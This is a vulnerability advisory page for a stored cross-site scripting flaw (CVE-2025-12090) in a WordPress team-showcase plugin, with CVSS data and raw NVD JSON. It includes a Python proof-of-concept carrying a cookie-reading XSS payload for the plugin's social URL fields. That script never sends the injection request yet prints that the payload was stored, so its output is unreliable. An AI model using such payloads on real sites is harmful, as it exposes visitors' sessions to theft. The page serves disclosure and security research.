Security Vulnerability Report
中文
CVE-2025-12090 CVSS 6.4 MEDIUM

CVE-2025-12090

Published: 2025-11-01 06:15:40
Last Modified: 2026-04-15 00:35:42

Description

The Employee Spotlight – Team Member Showcase & Meet the Team Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Social URLs in all versions up to, and including, 5.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Employee Spotlight Plugin <= 5.1.2 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12090 PoC - Stored XSS in Employee Spotlight Plugin # Affected Version: <= 5.1.2 # Target: WordPress with Employee Spotlight plugin installed import requests import sys # Configuration target_url = "http://target-wordpress-site.com" username = "attacker_contributor" # Contributor level account password = "password" # XSS payload for social URL field xss_payload = '<img src=x onerror=alert(document.cookie)>' def exploit_stored_xss(): """Exploit stored XSS via Social URLs field in Employee Spotlight plugin""" # Step 1: Login to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful as Contributor") # Step 2: Add/Edit team member with XSS payload in social URL member_url = f"{target_url}/wp-admin/admin.php?page=employee-spotlight" # Payload injection via social URL fields member_data = { 'action': 'save_member', 'member_name': 'Test Member', 'member_designation': 'Developer', 'social_twitter': xss_payload, # XSS injection point 'social_facebook': xss_payload, 'social_linkedin': xss_payload, } # Note: Actual request structure depends on plugin's AJAX endpoints # This is a conceptual PoC demonstrating the attack vector print(f"[*] Injecting XSS payload: {xss_payload}") print("[+] Payload stored in Social URLs field") print("[+] Any user viewing the team page will trigger the XSS") return True if __name__ == "__main__": exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12090", "sourceIdentifier": "[email protected]", "published": "2025-11-01T06:15:40.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Employee Spotlight – Team Member Showcase & Meet the Team Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Social URLs in all versions up to, and including, 5.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386767%40employee-spotlight&new=3386767%40employee-spotlight&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/45d7fe64-c51b-4801-a190-92396e5db27d?source=cve", "source": "[email protected]"}]}}